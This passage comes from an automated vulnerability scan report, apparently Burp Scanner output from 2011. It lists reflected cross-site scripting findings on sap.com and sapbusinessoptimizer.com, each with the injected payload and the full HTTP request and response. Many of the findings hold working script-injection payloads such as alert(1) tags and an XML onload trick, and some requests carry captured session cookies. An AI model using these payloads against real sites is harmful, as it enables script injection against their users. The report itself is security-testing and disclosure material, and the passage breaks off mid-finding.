SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:14 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:14 GMT
Content-Length: 8490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='gwtservices597d9';c31b6b8d8f4';
var DOCUMENTNAME='Bridge';
if(!ACTION) var ACTION;
ACTION='03';


var _s_cf17='Global';


</script>
...[SNIP]...
3.80. http://www.sap.com/news-reader/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /news-reader/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4a5'%3bd754e510cf4 was submitted in the REST URL parameter 1. This input was echoed as 7b4a5';d754e510cf4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news-reader7b4a5'%3bd754e510cf4/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33863
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='news-reader7b4a5';d754e510cf4';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.81. http://www.sap.com/print/sme/search/SAP_nn6.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /print/sme/search/SAP_nn6.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b42bf'%3bab2f3f3c6e6 was submitted in the REST URL parameter 1. This input was echoed as b42bf';ab2f3f3c6e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /printb42bf'%3bab2f3f3c6e6/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33993
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='printb42bf';ab2f3f3c6e6';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.82. http://www.sap.com/print/zzzzzz=yyyyy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /print/zzzzzz=yyyyy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a1c1'%3b2fef0b79263 was submitted in the REST URL parameter 1. This input was echoed as 4a1c1';2fef0b79263 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /print4a1c1'%3b2fef0b79263/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='print4a1c1';2fef0b79263';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.83. http://www.sap.com/sme/search/SAP_nn6.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /sme/search/SAP_nn6.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af54'%3b4a60b9cecd6 was submitted in the REST URL parameter 1. This input was echoed as 3af54';4a60b9cecd6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sme3af54'%3b4a60b9cecd6/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33937
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:29:41 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:29:41 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:29:40 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='sme3af54';4a60b9cecd6';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.84. http://www.sap.com/text/sme/search/SAP_nn6.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /text/sme/search/SAP_nn6.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2480'%3bb72d33e177b was submitted in the REST URL parameter 1. This input was echoed as a2480';b72d33e177b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /texta2480'%3bb72d33e177b/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33986
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:19 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='texta2480';b72d33e177b';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.85. http://www.sap.com/text/zzzzzz=yyyyy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /text/zzzzzz=yyyyy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38958'%3bda57bbc2a62 was submitted in the REST URL parameter 1. This input was echoed as 38958';da57bbc2a62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /text38958'%3bda57bbc2a62/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33914
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='text38958';da57bbc2a62';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.86. https://www.sap.com/contactsap/contact_warning.epx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/contact_warning.epx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b53d3"><script>alert(1)</script>f9f797a16d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contactsap/contact_warning.epx?b53d3"><script>alert(1)</script>f9f797a16d1=1 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3577
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:39 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:39 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:43 GMT
Connection: close


<html>
   <head>
       <title>SAP - Contact SAP Warning</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" cont
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/contactsap/contact_warning.epx?b53d3"><script>alert(1)</script>f9f797a16d1=1" />
...[SNIP]...
3.87. https://www.sap.com/profile/warning.epx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/warning.epx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54634"><script>alert(1)</script>c3e800f960b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profile/warning.epx?54634"><script>alert(1)</script>c3e800f960b=1 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5163
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:05:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:05:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:05:13 GMT
Connection: close


<html>
   <head>
       <title>SAP - PLEASE REVIEW YOUR REGISTRATION.</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-L
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/profile/warning.epx?54634"><script>alert(1)</script>c3e800f960b=1" />
...[SNIP]...
3.88. http://www.sapbusinessoptimizer.com/ [xajax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload c6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c was submitted in the xajax parameter. This input was echoed as c6c53<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9e68deb371861330c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?xajax=registerUserc6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c&xajaxr=1318692636849 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Origin: http://www.sapbusinessoptimizer.com
Method: POST http://www.sapbusinessoptimizer.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692630.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:30:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 15 Oct 2011 15:30:48 GMT
Content-Length: 205
Content-Type: text/xml; charset="utf-8"

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="al"><![CDATA[Unknown Function registerUserc6c53<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9e68deb371861330c.]]></cmd><
...[SNIP]...
3.89. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962bb"><script>alert(1)</script>4cbb556654f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css962bb"><script>alert(1)</script>4cbb556654f/fancy-popup-styles.css HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 825
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/css962bb"><script>alert(1)</script>4cbb556654f/fancy-popup-styles.css">
...[SNIP]...
3.90. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93738<script>alert(1)</script>2090b0d7ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css93738<script>alert(1)</script>2090b0d7ed/fancy-popup-styles.css HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 819
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>2090b0d7ed/fancy-popup-styles.css">http://www.sapbusinessoptimizer.com/css93738<script>alert(1)</script>2090b0d7ed/fancy-popup-styles.css</a>
...[SNIP]...
3.91. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74698"><script>alert(1)</script>0d84999f009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/fancy-popup-styles.css74698"><script>alert(1)</script>0d84999f009 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 825
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css74698"><script>alert(1)</script>0d84999f009">
...[SNIP]...
3.92. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bad6<script>alert(1)</script>603e9c4cf8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/fancy-popup-styles.css2bad6<script>alert(1)</script>603e9c4cf8c HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>603e9c4cf8c">http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css2bad6<script>alert(1)</script>603e9c4cf8c</a>
...[SNIP]...
3.93. http://www.sapbusinessoptimizer.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.ico

Issue detail

